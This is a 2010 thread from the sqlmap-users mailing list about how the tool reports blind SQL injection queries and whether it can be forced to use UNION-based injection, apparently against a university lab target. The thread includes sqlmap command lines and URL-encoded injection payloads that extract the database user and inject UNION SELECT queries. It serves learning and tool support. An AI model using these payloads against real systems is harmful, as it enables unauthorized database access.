sqlmap-users

[sqlmap-users] Fw: Which get was the right

[Beatriz D. <bea...@ya...>]

For example, you run:

sqlmap -u http://XXX.XXX.XXX.XXX/something/?departamento=0 -v 5 --sql-query "SELECT CURRENT_USER()"

After the execution you find the current user:

[00:11:15] [INFO] retrieved: usqli@localhost
[00:11:15] [DEBUG] performed 112 queries in 87 seconds
SELECT CURRENT_USER():    'usqli@localhost'

But the results say that 112 queries were tried, like:

something/?departamento=0%20AND%20ORD%28MID%28%28IFNULL%28CAST%28CURRENT_USER%28%29%20AS%20CHAR%2810000%29%29%2C%20CHAR%2832%29%29%29%2C%2016%2C%201%29%29%20%3E%201%20AND%20316=316 HTTP/1.1

How can I know which one of the 112 got the result?





 
 
 

________________________________
 
From:Ignacio
Hernández [mailto:nac...@gm...] 
Sent: Miércoles, 20 de Enero de
2010 06:10 p.m.
To: Duran, Beatriz
Subject: Re: [sqlmap-users] Which
get was the right
 
HI Beatriz

When you run sqlmap against a target and one of the tests succeeds, sqlmap
tells you that. It tells you the quotes (single or doubles) and the nomber of
parenthesis needed to inject sql code. On lasts versions of sqlmap it does the
tests just one time and stores the data to a file telling you where this file
is each time you start sqlmap against the same target, for example:
[00:59:06] [INFO] using '/home/nacho/sqlmap/output/www.target.com/session' as session
file

You can open that file and see there what test worked.

Sorry about my english im spanish :)


2010/1/20 Duran, Beatriz 

Hi, after you ran sqlmap to get for example, the list of
tables; it gives you the query applied but how could you know which test was
the one that worked? 
 
 
Thanks,

  
 
  
  

------------------------------------------------------------------------------
Throughout its 18-year history, RSA Conference consistently attracts the
world's best and brightest in the field, creating opportunities for Conference
attendees to learn about information security's most important issues through
interactions with peers, luminaries and emerging and established companies.
http://p.sf.net/sfu/rsaconf-dev2dev
_______________________________________________
sqlmap-users mailing list
sql...@li...
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
 
 
      
 
		KPMG esta comprometido con la responsabilidad ambiental.
 
		Por favor, considere el medio ambiente antes de imprimir este e-mail. 
  
 
		The information in this e-mail is confidential and may be legally 
		privileged. It is intended solely for the addressee. If you are not the 
		intended recipient, any disclosure, copying, distribution or any action 
		taken or omitted to be taken in reliance on it, is prohibited and may be 
		unlawful. 


		KPMG cannot guarantee that e-mail communications are secure or 
		error-free, as information could be intercepted, corrupted, amended, 
		lost, destroyed, arrive late or incomplete, or contain viruses.
 
		The opinions or professional criteria provided by our Firm are issued 
		formally through a document drafted in the Firm's letterhead and signed 
		by the partner or director responsible for the service; consequently, 
		the contents and/or documentation relating to this communication may 
		include opinions, recommendations or other information that should not 
		be used as basis or grounds for influencing any decisions. Furthermore, 
		there can be no guarantee that the information contained in this e-mail 
		is accurate as of the date it is received or that it will continue to be 
		accurate in the future. In this sense, the Firm assumes no 
		responsibility, civil or otherwise for information included herein or 
		for any potential errors or inaccuracies this document may contain.
 
		KPMG Cardenas Dosal, S .C. is a Mexican partnership and the Mexican 
		member firm of the KPMG network of independent firms affiliated with 
		KPMG International Cooperative (KPMG International), a Swiss entity. 
		KPMG International Cooperative (KPMG International) is a Swiss entity. 
		Member firms of the KPMG network of independent firms are affiliated 
		with KPMG International. KPMG International provides no client services. 
		No member firm has any authority to obligate or bind KPMG International 
		Cooperative or any other member firm vis-à-vis third parties, nor does 
		KPMG International Cooperative have any such authority to obligate or 
		bind any member firm in any manner whatsoever. Each member firm is a 
		legally distinct and separate entity. 


      

Re: [sqlmap-users] Fw: Which get was the right

[Beatriz D. <bea...@ya...>]

Ok, got it; now that takes me to another issue; sqlmap says that the target doesn't work with UNION:


[02:24:17] [WARNING] the target url is not affected by an exploitable full inband sql injection vulnerability
[02:24:17] [INFO] confirming partial (single entry) inband sql injection on parameter 'departamento' by appending a false condition after the parameter value
[02:24:18] [TRAFFIC OUT] HTTP request:
GET /uoc/alumnos/sqlinjection/?departamento=0%20AND%203320=3321%20UNION%20ALL%20SELECT%20NULL%23%20AND%203353=3353 HTTP/1.1

But if I apply directly:

http://X.X.X.X/uoc/alumnos/sqlinjection/?departamento=0%20UNION%20ALL%20SELECT%20NULL,%20%271234%27

It works, the number 1234 is shown as part of a list; is there a way to force sqlmap to work with UNION and avoid the testing that --use-union does?







 I    Have    Learned    So much from God    That I can no longer    Call    Myself A Christian, a Hindu, a Muslim    A Buddhist, a Jew.    The Truth has shared so much of Itself   With me  That I can no longer call myself     A man, a woman, and angel    Or even pure    Soul.   Love has    Befriended Hafiz so completely    It has turned to ash    And freed    Me    Of every concept and image    My mind has ever known. –Hafiz, Persian poet (1315 – 1390)




________________________________
From: Ignacio Hernández <nac...@gm...>
To: Beatriz Duran <bea...@ya...>
Sent: Thu, January 21, 2010 8:41:14 AM
Subject: Re: [sqlmap-users] Fw: Which get was the right


ok, that's because is a blind sql injection. you can google it to find more info about it but the bassic is tha in blind sqli you try to figure out the result of vthe query char by char. for example if the user is root, you have to first find r, then o...
This is like this because in blind sql injections the database only answers "True"  or "False". so you ask the database: is the first char bigger than "a"?  Then it answers yea... and so on. Thats why there are so many querys, all of them needed to guess the content of the query.
El 21/01/2010 7:37, "Beatriz Duran" <bea...@ya...> escribió:
>
>
>>For example, you run:
>
>sqlmap -u http://XXX.XXX.XXX.XXX/something/?departamento=0 -v 5 --sql-query "SELECT CURRENT_USER()"
>
>After the execution you find the current user:
>
>[00:11:15] [INFO] retrieved: usqli@localhost
>[00:11:15] [DEBUG] performed 112 queries in 87 seconds
>SELECT CURRENT_USER():    'usqli@localhost'
>
>>But the results say that 112 queries were tried, like:
>
>something/?departamento=0%20AND%20ORD%28MID%28%28IFNULL%28CAST%28CURRENT_USER%28%29%20AS%20CHAR%2810000%29%29%2C%20CHAR%2832%29%29%29%2C%2016%2C%201%29%29%20%3E%201%20AND%20316=316 HTTP/1.1
>
>How can I know which one of the 112 got the result?
>
>
>
>
>
>
>>
> 
> 
>>
>>
________________________________
 >
>From:Ignacio
>Hernández [mailto:nac...@gm...] 
>Sent: Miércoles, 20 de Enero de
>2010 06:10 p.m.
>To: Duran, Beatriz
>Subject: Re: [sqlmap-users] Which
>get was the right
>>
> 
>
>HI Beatriz
>
>When you run sqlmap against a target and one of the tests succeeds, sqlmap tells yo...
>2010/1/20 Duran, Beatriz 
>
>>Hi, after you ran sqlmap to get for example, the list of tables; it gives you the query applied but...
>
>
>------------------------------------------------------------------------------
>Throughout its 18-yea... >
> 
>>
>	
>		
>		
>
>		
>		
>
>		
>		
>
>		
>		KPMG esta comprometido con la responsabilidad ambiental.
>
>		
>		
>		Por ...
>
>------------------------------------------------------------------------------
>>Throughout its 18-year history, RSA Conference consistently attracts the
>>world's best and brightest in the field, creating opportunities for Conference
>>attendees to learn about information security's most important issues through
>>interactions with peers, luminaries and emerging and established companies.
>http://p.sf.net/sfu/rsaconf-dev2dev
>_______________________________________________
>>sqlmap-users mailing list
>sql...@li...
>https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>


      

Re: [sqlmap-users] Fw: Which get was the right

[Bernardo D. A. G. <ber...@gm...>]

On Fri, Jan 22, 2010 at 08:34, Beatriz Duran <bea...@ya...> wrote:
> ...
> http://X.X.X.X/uoc/alumnos/sqlinjection/?departamento=0%20UNION%20ALL%20SELECT%20NULL,%20%271234%27
>
> It works, the number 1234 is shown as part of a list; is there a way to
> force sqlmap to work with UNION and avoid the testing that --use-union does?

Not yet. Test for UNION query SQL injection and detection phase in
general will be totally rewritten in the next months though.

-- 
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)
PGP Key ID: 0x05F5A30F